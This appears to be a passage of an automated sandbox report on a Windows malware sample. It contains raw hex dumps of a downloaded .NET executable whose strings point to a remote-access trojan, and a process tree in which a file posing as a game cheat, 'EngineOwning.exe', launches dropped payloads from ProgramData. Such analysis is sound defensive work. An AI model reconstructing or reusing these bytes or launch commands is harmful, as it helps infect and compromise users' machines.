                                                                              Data Ascii: 5BCUCxCCeCuOvPRxZmitu5tiuuu7<u
                                                                              2022-04-26 19:08:58 UTC4371INData Raw: 9d 21 00 00 00 00 96 00 75 00 85 00 0b 00 bd 21 00 00 00 00 96 00 75 00 8c 00 0d 00 24 32 00 00 00 00 96 00 75 00 93 00 0f 00 54 32 00 00 00 00 96 00 75 00 9a 00 11 00 00 00 00 00 00 00 c6 05 0d 00 4f 00 13 00 80 33 00 00 00 00 86 18 2e 14 a5 00 13 00 d9 21 00 00 00 00 91 18 34 14 65 00 14 00 f4 21 00 00 00 00 86 00 75 00 aa 00 14 00 f4 33 00 00 00 00 86 00 75 00 af 00 15 00 0c 22 00 00 00 00 86 00 81 00 aa 00 16 00 30 35 00 00 00 00 86 00 81 00 af 00 17 00 d4 36 00 00 48 00 81 00 75 00 b6 00 18 00 24 22 00 00 00 00 96 00 75 00 be 00 1a 00 fc 36 00 00 00 00 96 00 75 00 65 00 1a 00 5c 37 00 00 00 00 96 00 75 00 c2 00 1a 00 3a 22 00 00 00 00 96 00 75 00 c6 00 1a 00 54 38 00 00 00 00 96 00 75 00 d5 00 1c 00 00 00 00 00 80 00 96 20 75 00 dc 00 1d 00 94 38 00
                                                                              Data Ascii: !u!u$2uT2uO3.!4e!u3u"056Hu$"u6ue\7u:"uT8u u8
                                                                              2022-04-26 19:08:58 UTC4372INData Raw: 00 08 00 91 00 81 00 be 00 42 00 46 24 00 00 00 00 91 00 75 00 b6 01 42 00 4e 24 00 00 00 00 83 18 2e 14 27 00 43 00 3c 50 00 00 08 00 83 00 75 00 bc 01 43 00 5c 51 00 00 08 00 83 00 75 00 c0 01 43 00 6d 21 00 00 00 00 86 18 2e 14 27 00 44 00 54 52 00 00 08 00 93 00 75 00 c5 01 44 00 5e 24 00 00 00 00 93 00 75 00 c9 01 44 00 72 24 00 00 00 00 93 00 81 00 c9 01 46 00 95 24 00 00 00 00 93 00 99 00 c9 01 48 00 6d 21 00 00 00 00 86 18 2e 14 27 00 4a 00 c8 52 00 00 08 00 93 00 75 00 c5 01 4a 00 6d 21 00 00 00 00 86 18 2e 14 27 00 4a 00 18 53 00 00 08 00 93 00 75 00 c5 01 4a 00 6d 21 00 00 00 00 86 18 2e 14 27 00 4a 00 78 53 00 00 08 00 93 00 75 00 c5 01 4a 00 6d 21 00 00 00 00 86 18 2e 14 27 00 4a 00 e8 53 00 00 08 00 93 00 75 00 c5 01 4a 00 6d 21 00 00 00 00
                                                                              Data Ascii: BF$uBN$.'C<PuC\QuCm!.'DTRuD^$uDr$F$Hm!.'JRuJm!.'JSuJm!.'JxSuJm!.'JSuJm!
                                                                              2022-04-26 19:08:58 UTC4373INData Raw: 58 61 00 00 00 00 96 00 49 02 31 05 8b 00 18 63 00 00 00 00 96 00 3f 03 03 01 8c 00 34 64 00 00 00 00 96 00 ae 18 37 05 8d 00 ac 64 00 00 00 00 91 00 75 00 37 05 8e 00 e8 64 00 00 00 00 96 00 c6 02 37 05 8f 00 54 67 00 00 00 00 91 00 75 00 3c 05 90 00 88 68 00 00 00 00 91 00 75 00 65 00 91 00 dc 68 00 00 00 00 96 00 e9 13 43 05 91 00 30 69 00 00 00 00 91 18 34 14 65 00 92 00 e4 69 00 00 00 00 96 00 48 16 be 00 92 00 48 6b 00 00 00 00 91 00 28 0c be 00 92 00 22 27 00 00 00 00 86 18 2e 14 27 00 92 00 35 27 00 00 00 00 81 00 75 00 a5 00 92 00 d0 6b 00 00 00 00 81 00 75 00 27 00 93 00 10 6c 00 00 00 00 81 00 75 00 50 04 93 00 38 6c 00 00 00 00 81 00 75 00 90 05 93 00 a8 6c 00 00 00 00 86 00 0f 18 56 04 94 00 4f 27 00 00 00 00 81 00 81 00 50 04 95 00 6d 27 00
                                                                              Data Ascii: XaI1c?4d7du7d7Tgu<huehC0i4eiHHk("'.'5'uku'luP8lulVO'Pm'
                                                                              2022-04-26 19:08:58 UTC4375INData Raw: 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 03 00 99 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 03 00 99 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 03 00 99 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 01 00 01 00 75 00 03 00 02 00 81 00 01 00 03 00 99 00 00 20 01 00 75 00 00 00 02 00 81 00 00 00 03 00 99 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00 75 00 00 00 02 00 81 00 00 00 01 00
                                                                              Data Ascii: uuuuuuuuuuuuuuuuuuu uuu
                                                                              2022-04-26 19:08:58 UTC4376INData Raw: 31 02 7b 0b 1a 01 61 02 e5 0b 33 08 69 02 2e 14 a2 05 19 00 c6 02 54 08 c9 02 2e 14 a5 00 91 02 2b 02 a2 05 91 02 43 14 18 08 19 00 5d 0c bc 01 d1 02 8c 1b 5c 08 e1 02 a9 19 6e 08 e9 02 2e 14 74 08 e9 02 3d 05 7b 08 19 00 89 07 27 00 c1 00 89 07 27 00 f1 01 f8 05 c2 00 09 03 2e 14 ad 05 09 03 98 18 90 08 f9 02 16 14 96 08 01 03 9d 19 9c 08 19 03 7a 0e a2 08 01 03 62 1a 2b 00 01 02 5d 0c 2f 00 01 02 58 0a a7 08 21 00 fa 16 b5 08 21 00 fd 01 bb 08 29 00 28 03 bb 08 a1 00 eb 1b c0 08 99 00 2e 14 22 00 29 03 8c 13 d4 08 21 03 f6 1a d9 08 21 03 40 0a a2 08 21 03 31 0a a5 00 21 03 89 07 27 00 21 03 03 1b e0 08 21 03 00 04 a5 00 39 02 ff 00 f8 08 31 03 2e 14 ff 08 19 00 33 0c 27 00 41 03 c2 1a 15 09 51 03 0e 12 76 05 51 03 54 01 bc 01 51 03 d1 18 2f 09 59 03 f5
                                                                              Data Ascii: 1{a3i.T.+C]\n.t={''.zb+]/X!!)(.")!!@!1!'!!91.3'AQvQTQ/Y
                                                                              2022-04-26 19:08:58 UTC4377INData Raw: 03 b0 13 82 0d c1 00 ea 0d 89 0d 81 05 68 18 65 00 2c 00 e2 02 84 0b 89 03 3e 1a a3 0d 2c 00 16 14 ba 0d 54 00 9d 19 33 00 2c 00 58 0a cd 0d 54 00 62 1a 2b 00 91 05 4d 0f d7 0d 91 05 dd 02 dd 0d 59 00 0f 07 e4 0d 99 05 cd 07 ea 0d a9 05 47 12 f4 0d 5c 00 cd 07 2a 0e 5c 00 a7 18 36 0e 64 00 5a 04 51 0e 61 02 e8 18 eb 07 11 01 2e 14 a2 05 11 01 0e 1b 73 0e d1 05 e6 1a 79 0e c9 05 2e 14 27 00 e1 05 9e 01 f6 00 c1 05 28 0c 7f 0e 2c 00 3c 12 27 00 01 02 95 16 b9 05 31 02 33 01 ad 0e 01 02 dc 0e be 05 e9 05 97 07 b2 0e 31 02 33 01 b7 0e 31 02 33 01 bc 0e 31 02 33 01 c1 0e 31 02 54 01 c8 0e 99 04 97 07 cd 0e 31 02 54 01 d2 0e 31 02 54 01 d7 0e 31 02 54 01 dc 0e 31 02 79 04 e3 0e f1 05 97 07 e8 0e e9 01 96 1b bc 01 c9 04 2e 14 fe 0e 79 03 2e 14 a5 00 39 02 f2 04
                                                                              Data Ascii: he,>,T3,XTb+MYG\*\6dZQa.sy.'(,<'131313131T1T1T1T1y.y.9
                                                                              2022-04-26 19:08:58 UTC4379INData Raw: 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 3a 07 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 cc 00 8f 02 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 a9 16 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 cc 00 7f 19 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 cc 00 19 12 00 00 00 00 00 00 00 00 02 00 00 00 b9 1c 00 00 03 00 02 00 04 00 02 00 05 00 02 00 07 00 06 00 08 00 06 00 10 00 0f 00 14 00 13 00 18 00 17 00 19 00 17 00 1f 00 1e 00 20 00 1e 00 21 00 1e 00 22 00 1e 00 23 00 1e 00 24 00 1e 00 25 00 1e 00 26 00 1e 00 2a 00 29 00 2b 00 29 00 30 00 2f 00 31 00 2f 00 32 00 2f 00 3a 00 39 00 3f 00 3e 00 40 00 3e 00 41 00 40 00 00 00 00 00 24 00 75 00 00 00 00 00 5c 00 75 00 13 01 7b 09 17 01 7b 09 19 01 7b 09 8d 01 25 0b 8f 01 25 0b 79
                                                                              Data Ascii: : !"#$%&*)+)0/1/2/:9?>@>A@$u\u{{{%%y
                                                                              2022-04-26 19:08:58 UTC4380INData Raw: 42 65 67 69 6e 49 6e 76 6f 6b 65 00 49 45 6e 75 6d 65 72 61 62 6c 65 00 49 44 69 73 70 6f 73 61 62 6c 65 00 54 6f 44 6f 75 62 6c 65 00 52 75 6e 74 69 6d 65 46 69 65 6c 64 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 4d 65 74 68 6f 64 48 61 6e 64 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e 64 6c 65 00 50 72 6f 63 65 73 73 48 61 6e 64 6c 65 00 57 61 69 74 48 61 6e 64 6c 65 00 54 6f 53 69 6e 67 6c 65 00 53 65 74 41 73 53 69 6e 67 6c 65 00 49 6e 73 74 61 6c 6c 5f 46 69 6c 65 00 73 7a 45 78 65 46 69 6c 65 00 44 65 63 6f 64 65 46 72 6f 6d 46 69 6c 65 00 53 61 76 65 42 79 74 65 73 54 6f 46 69 6c 65 00 49 73 49 6e 52 6f 6c 65 00 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e
                                                                              Data Ascii: BeginInvokeIEnumerableIDisposableToDoubleRuntimeFieldHandleRuntimeMethodHandleRuntimeTypeHandleCloseHandleGetTypeFromHandleProcessHandleWaitHandleToSingleSetAsSingleInstall_FileszExeFileDecodeFromFileSaveBytesToFileIsInRoleWindowsBuiltIn
                                                                              2022-04-26 19:08:58 UTC4381INData Raw: 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 74 65 00 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 74 74 72 69 62 75 74 65 00 73 65 74 5f 55 73 65 53 68 65 6c 6c 45 78 65 63 75 74 65 00 52 65 61 64 42 79 74 65 00 57 72 69 74 65 42 79 74 65 00 67 65 74 5f 56 61 6c 75 65 00 44 65 6c 65 74 65 56 61 6c 75 65 00 54 72 79 47 65 74 56 61 6c 75 65 00 53 65 74 56 61 6c 75 65 00 76 61 6c 75 65 00 52 65 6d 6f 76 65 00 43 6c 69 65 6e 74 2e 65 78 65 00 67 65 74 5f 53 69 7a 65 00 73 65 74 5f 42 6c 6f 63 6b 53 69 7a 65 00 67 65 74 5f 54 6f 74 61 6c 53 69 7a 65 00 52 65 67 69 6f 6e 53 69 7a 65 00 73 65 74 5f 53 65 6e 64 42 75 66 66 65 72 53 69 7a 65 00
                                                                              Data Ascii: AssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteReadByteWriteByteget_ValueDeleteValueTryGetValueSetValuevalueRemoveClient.exeget_Sizeset_BlockSizeget_TotalSizeRegionSizeset_SendBufferSize
                                                                              2022-04-26 19:08:58 UTC4383INData Raw: 00 53 65 74 41 73 42 6f 6f 6c 65 61 6e 00 67 65 74 5f 4d 65 74 61 64 61 74 61 54 6f 6b 65 6e 00 47 65 74 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 00 58 35 30 39 43 68 61 69 6e 00 41 70 70 44 6f 6d 61 69 6e 00 67 65 74 5f 43 75 72 72 65 6e 74 44 6f 6d 61 69 6e 00 50 61 73 74 65 5f 62 69 6e 00 56 65 72 5f 73 69 6f 6e 00 47 65 74 46 69 6c 65 4e 61 6d 65 57 69 74 68 6f 75 74 45 78 74 65 6e 73 69 6f 6e 00 67 65 74 5f 4f 53 56 65 72 73 69 6f 6e 00 53 79 73 74 65 6d 2e 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 00 73 65 74 5f 49 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 50 72 6f 70 65
                                                                              Data Ascii: SetAsBooleanget_MetadataTokenGetPublicKeyTokenX509ChainAppDomainget_CurrentDomainPaste_binVer_sionGetFileNameWithoutExtensionget_OSVersionSystem.IO.CompressionApplicationSystem.Security.Authenticationset_ImpersonationSystem.ReflectionPrope
                                                                              2022-04-26 19:08:58 UTC4384INData Raw: 6f 72 00 49 6e 74 50 74 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 63 6e 74 54 68 72 65 61 64 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 44 65 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 73 65 74 5f 45 6e 61 62 6c 65 50 72 69 76 69 6c 65 67 65 73 00 67 65 74 5f 50 72 6f 70 65 72 74 69 65 73 00 45 78 70 61 6e 64 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 73 00 67 65 74 5f 4d 6f 64 75 6c 65 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 43 6f 6d 54 79 70 65 73 00 47 65 74 50 72 6f 63
                                                                              Data Ascii: orIntPtrSystem.DiagnosticscntThreadsMicrosoft.VisualBasic.DevicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesset_EnablePrivilegesget_PropertiesExpandEnvironmentVariablesget_ModulesSystem.Runtime.InteropServices.ComTypesGetProc
                                                                              2022-04-26 19:08:58 UTC4385INData Raw: 65 6d 6f 74 65 45 6e 64 50 6f 69 6e 74 00 67 65 74 5f 43 6f 75 6e 74 00 67 65 74 5f 50 72 6f 63 65 73 73 6f 72 43 6f 75 6e 74 00 43 72 65 61 74 65 54 6f 6f 6c 68 65 6c 70 33 32 53 6e 61 70 73 68 6f 74 00 47 65 74 50 61 74 68 52 6f 6f 74 00 50 61 72 61 6d 65 74 65 72 69 7a 65 64 54 68 72 65 61 64 53 74 61 72 74 00 43 6f 6e 76 65 72 74 00 41 62 6f 72 74 00 43 61 73 74 00 46 61 69 6c 46 61 73 74 00 54 6f 4c 69 73 74 00 50 72 6f 63 65 73 73 33 32 46 69 72 73 74 00 50 72 6f 63 65 73 73 33 32 4e 65 78 74 00 4d 6f 76 65 4e 65 78 74 00 53 79 73 74 65 6d 2e 54 65 78 74 00 47 65 74 57 69 6e 64 6f 77 54 65 78 74 00 47 65 74 46 6f 72 65 67 72 6f 75 6e 64 57 69 6e 64 6f 77 00 73 65 74 5f 43 72 65 61 74 65 4e 6f 57 69 6e 64 6f 77 00 4d 75 74 65 78 00 49 42 69 6e 64 43
                                                                              Data Ascii: emoteEndPointget_Countget_ProcessorCountCreateToolhelp32SnapshotGetPathRootParameterizedThreadStartConvertAbortCastFailFastToListProcess32FirstProcess32NextMoveNextSystem.TextGetWindowTextGetForegroundWindowset_CreateNoWindowMutexIBindC
                                                                              2022-04-26 19:08:58 UTC4387INData Raw: 75 00 31 00 79 00 6c 00 2f 00 56 00 72 00 56 00 6a 00 52 00 44 00 52 00 56 00 6d 00 7a 00 6a 00 57 00 59 00 4b 00 69 00 6f 00 54 00 75 00 56 00 31 00 70 00 34 00 52 00 49 00 55 00 2f 00 73 00 78 00 4a 00 4b 00 52 00 53 00 4b 00 2b 00 69 00 44 00 54 00 6f 00 57 00 49 00 35 00 2b 00 2b 00 30 00 49 00 37 00 4c 00 58 00 54 00 66 00 6c 00 6f 00 31 00 74 00 6e 00 38 00 66 00 4d 00 79 00 62 00 4d 00 69 00 47 00 69 00 6c 00 78 00 49 00 41 00 3d 00 3d 00 00 13 25 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 25 00 00 1b 44 00 66 00 73 00 72 00 41 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 00 59 61 00 54 00 59 00 34 00 55 00 45 00 70 00 54 00 65 00 56 00 4e 00 6a 00 54 00 33 00 4a 00 32 00 4d 00 45 00 34 00 32 00 63 00 31 00 52 00 6b 00 4d 00 6e 00 64 00 4c
                                                                              Data Ascii: u1yl/VrVjRDRVmzjWYKioTuV1p4RIU/sxJKRSK+iDToWI5++0I7LXTflo1tn8fMybMiGilxIA==%AppData%DfsrAdmin.exeYaTY4UEpTeVNjT3J2ME42c1RkMndL
                                                                              2022-04-26 19:08:58 UTC4388INData Raw: 00 6d 00 30 00 66 00 72 00 79 00 6c 00 33 00 6a 00 58 00 49 00 76 00 63 00 6c 00 65 00 74 00 47 00 66 00 6f 00 6e 00 56 00 43 00 59 00 37 00 4d 00 56 00 78 00 6c 00 4c 00 5a 00 79 00 65 00 49 00 6f 00 6c 00 50 00 71 00 63 00 59 00 64 00 37 00 73 00 2f 00 4f 00 4f 00 47 00 73 00 36 00 62 00 55 00 62 00 47 00 61 00 79 00 46 00 49 00 6b 00 4a 00 4e 00 56 00 36 00 41 00 6f 00 4a 00 39 00 7a 00 50 00 6f 00 46 00 79 00 66 00 30 00 64 00 69 00 6b 00 50 00 65 00 35 00 4e 00 36 00 72 00 36 00 7a 00 56 00 57 00 6c 00 49 00 56 00 32 00 71 00 4e 00 50 00 5a 00 56 00 45 00 67 00 62 00 48 00 72 00 53 00 77 00 55 00 30 00 4d 00 43 00 4d 00 66 00 4b 00 38 00 5a 00 4f 00 59 00 61 00 78 00 50 00 77 00 6d 00 77 00 63 00 39 00 51 00 30 00 52 00 4a 00 38 00 64 00 74 00 6b 00
                                                                              Data Ascii: m0fryl3jXIvcletGfonVCY7MVxlLZyeIolPqcYd7s/OOGs6bUbGayFIkJNV6AoJ9zPoFyf0dikPe5N6r6zVWlIV2qNPZVEgbHrSwU0MCMfK8ZOYaxPwmwc9Q0RJ8dtk
                                                                              2022-04-26 19:08:58 UTC4389INData Raw: 00 7a 00 54 00 4b 00 2f 00 61 00 57 00 79 00 49 00 4f 00 36 00 33 00 31 00 56 00 35 00 51 00 32 00 38 00 7a 00 38 00 61 00 45 00 50 00 5a 00 76 00 48 00 58 00 4b 00 45 00 64 00 67 00 42 00 47 00 4c 00 44 00 4a 00 56 00 32 00 6c 00 54 00 42 00 62 00 77 00 75 00 77 00 72 00 5a 00 36 00 2f 00 71 00 4e 00 70 00 54 00 55 00 62 00 7a 00 56 00 44 00 2f 00 2b 00 43 00 42 00 63 00 47 00 59 00 77 00 6b 00 35 00 6f 00 33 00 4a 00 51 00 41 00 46 00 5a 00 72 00 72 00 68 00 78 00 53 00 4f 00 72 00 43 00 57 00 34 00 6c 00 62 00 6b 00 32 00 37 00 61 00 78 00 58 00 61 00 6c 00 72 00 65 00 4a 00 62 00 51 00 49 00 63 00 31 00 6f 00 56 00 6b 00 4a 00 67 00 6e 00 52 00 55 00 4b 00 59 00 35 00 68 00 61 00 6f 00 77 00 72 00 33 00 4f 00 36 00 61 00 33 00 76 00 43 00 6f 00 78 00
                                                                              Data Ascii: zTK/aWyIO631V5Q28z8aEPZvHXKEdgBGLDJV2lTBbwuwrZ6/qNpTUbzVD/+CBcGYwk5o3JQAFZrrhxSOrCW4lbk27axXalreJbQIc1oVkJgnRUKY5haowr3O6a3vCox
                                                                              2022-04-26 19:08:58 UTC4391INData Raw: 79 00 56 00 79 00 6e 00 37 00 73 00 7a 00 58 00 4b 00 50 00 6d 00 34 00 44 00 51 00 3d 00 3d 00 00 80 b1 7a 00 64 00 30 00 31 00 77 00 46 00 70 00 69 00 6d 00 56 00 4a 00 33 00 43 00 53 00 77 00 54 00 51 00 53 00 73 00 45 00 52 00 77 00 54 00 52 00 6e 00 63 00 42 00 6a 00 57 00 71 00 49 00 6c 00 2f 00 74 00 58 00 57 00 45 00 58 00 68 00 50 00 65 00 70 00 7a 00 74 00 39 00 50 00 79 00 76 00 31 00 75 00 2b 00 45 00 36 00 62 00 57 00 55 00 58 00 57 00 61 00 4d 00 48 00 71 00 70 00 50 00 65 00 63 00 50 00 6e 00 68 00 31 00 34 00 67 00 78 00 66 00 4f 00 72 00 36 00 74 00 4e 00 6a 00 49 00 51 00 5a 00 41 00 76 00 51 00 3d 00 3d 00 00 00 00 00 b4 a4 37 e3 48 e6 1b 47 42 fe 77 53 df b4 06 11 00 08 b7 7a 5c 56 19 34 e0 89 05 15 12 48 01 08 06 15 12 80 b8 01 08 02
                                                                              Data Ascii: yVyn7szXKPm4DQ==zd01wFpimVJ3CSwTQSsERwTRncBjWqIl/tXWEXhPepzt9Pyv1u+E6bWUXWaMHqpPecPnh14gxfOr6tNjIQZAvQ==7HGBwSz\V4H
                                                                              2022-04-26 19:08:58 UTC4392INData Raw: 06 28 01 12 80 f4 08 03 06 11 51 04 00 00 1d 0e 09 00 01 15 12 41 01 0e 11 51 0f 00 02 01 11 51 15 12 55 03 12 59 12 80 c8 02 06 06 15 12 41 01 0e 08 20 02 02 12 59 12 80 c8 0a 20 03 08 10 11 51 10 12 5d 08 07 20 03 08 0e 10 1c 08 01 15 06 20 02 08 0e 10 1c 06 00 02 02 0e 1d 05 04 00 01 02 0e 06 00 02 0e 12 0d 08 05 00 01 0e 12 0d 06 00 02 0e 05 12 0d 03 06 12 61 03 06 12 65 03 06 12 69 02 06 1c 04 00 00 12 61 05 00 01 01 12 61 04 00 00 12 65 05 00 01 01 12 65 04 00 01 01 0a 04 00 00 12 69 05 00 01 01 12 69 03 00 00 1c 04 00 01 01 08 0a 00 04 02 1c 12 6d 12 71 11 75 05 00 01 01 12 79 04 00 01 01 1c 06 00 01 01 12 80 f4 04 00 01 01 0e 04 08 00 12 61 04 08 00 12 65 03 08 00 02 03 08 00 08 1b 06 15 12 7d 01 15 12 80 81 0a 12 80 85 1c 12 61 12 80 89 0e 1d 05
                                                                              Data Ascii: (QAQQUYA Y Q] aeiaaeeiimquyae}a
                                                                              2022-04-26 19:08:58 UTC4393INData Raw: 03 0e 12 3d 12 81 2d 03 07 01 02 07 20 03 01 02 0e 10 02 08 07 04 12 4d 1d 05 08 05 05 00 02 0e 0e 1c 05 20 01 12 4d 0e 06 07 03 1d 05 08 08 11 07 09 08 08 08 08 12 81 e1 12 31 08 12 81 e5 12 45 06 15 12 25 02 08 0e 05 20 02 01 08 02 06 20 01 12 81 e1 08 05 20 00 12 81 e5 04 20 00 12 45 07 00 01 12 45 11 81 f1 0a 07 03 0e 15 12 25 02 08 0e 0e 08 20 02 02 13 00 10 13 01 53 07 39 08 08 08 08 0e 08 12 4d 1d 05 08 08 08 08 08 12 31 08 12 81 e1 1d 05 02 08 08 1d 05 15 12 80 b8 01 08 07 1d 05 08 1d 05 05 1d 03 09 1d 05 08 06 08 05 05 06 08 1d 03 12 81 e5 12 45 12 2d 12 2d 05 08 12 29 08 0a 08 02 05 12 0d 02 02 08 08 08 08 04 00 00 12 2d 05 20 01 12 4d 03 05 20 01 12 0d 0e 05 20 01 01 1d 03 07 20 03 0e 1d 05 08 08 07 20 02 01 13 00 13 01 04 07 01 12 29 04 20 00
                                                                              Data Ascii: =- M M1E% EE% S9M1E--)- M )
                                                                              2022-04-26 19:08:58 UTC4395INData Raw: 82 65 07 07 04 05 1d 05 08 08 06 00 02 0c 1d 05 08 06 00 02 0d 1d 05 08 06 00 02 09 1d 05 08 06 00 02 0b 1d 05 08 06 00 02 06 1d 05 08 06 00 02 0a 1d 05 08 09 07 03 12 81 35 1d 05 1d 05 06 07 02 12 80 f4 02 0a 07 04 12 3d 12 19 18 12 81 2d 06 00 03 08 0e 0e 02 08 00 02 12 83 0d 18 12 45 05 20 01 1c 1d 1c 04 07 01 1d 1c 00 48 f3 00 00 00 00 00 00 00 00 00 00 5e f3 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 f3 00 00 00 00 00 00 00 00 5f 43 6f 72 45 78 65 4d 61 69 6e 00 6d 73 63 6f 72 65 65 2e 64 6c 6c 00 00 00 00 00 ff 25 00 20 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: e5=-E H^ P_CorExeMainmscoree.dll% @


                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:21:08:52
                                                                              Start date:26/04/2022
                                                                              Path:C:\Users\user\Desktop\EngineOwning.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\EngineOwning.exe"
                                                                              Imagebase:0x7ff75af60000
                                                                              File size:497152 bytes
                                                                              MD5 hash:6B7E5F4517D6837EEA3C06BAE837F767
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Target ID:1
                                                                              Start time:21:08:53
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff77f440000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:3
                                                                              Start time:21:09:03
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c start C:/ProgramData/winrsdhost.exe
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:4
                                                                              Start time:21:09:04
                                                                              Start date:26/04/2022
                                                                              Path:C:\ProgramData\winrsdhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:/ProgramData/winrsdhost.exe
                                                                              Imagebase:0x50000
                                                                              File size:4442624 bytes
                                                                              MD5 hash:108368196293017A706ADE912F519495
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 25%, Virustotal, Browse
                                                                              • Detection: 41%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:6
                                                                              Start time:21:09:05
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c start C:/ProgramData/mdsigstub.exe
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:7
                                                                              Start time:21:09:05
                                                                              Start date:26/04/2022
                                                                              Path:C:\ProgramData\mdsigstub.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:/ProgramData/mdsigstub.exe
                                                                              Imagebase:0x2f0000
                                                                              File size:57856 bytes
                                                                              MD5 hash:62D39F4717804AE34F820704722C5284
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 72%, Virustotal, Browse
                                                                              • Detection: 34%, Metadefender, Browse
                                                                              • Detection: 77%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:8
                                                                              Start time:21:09:11
                                                                              Start date:26/04/2022
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c cls
                                                                              Imagebase:0x7ff602050000
                                                                              File size:273920 bytes
                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:10
                                                                              Start time:21:09:15
                                                                              Start date:26/04/2022
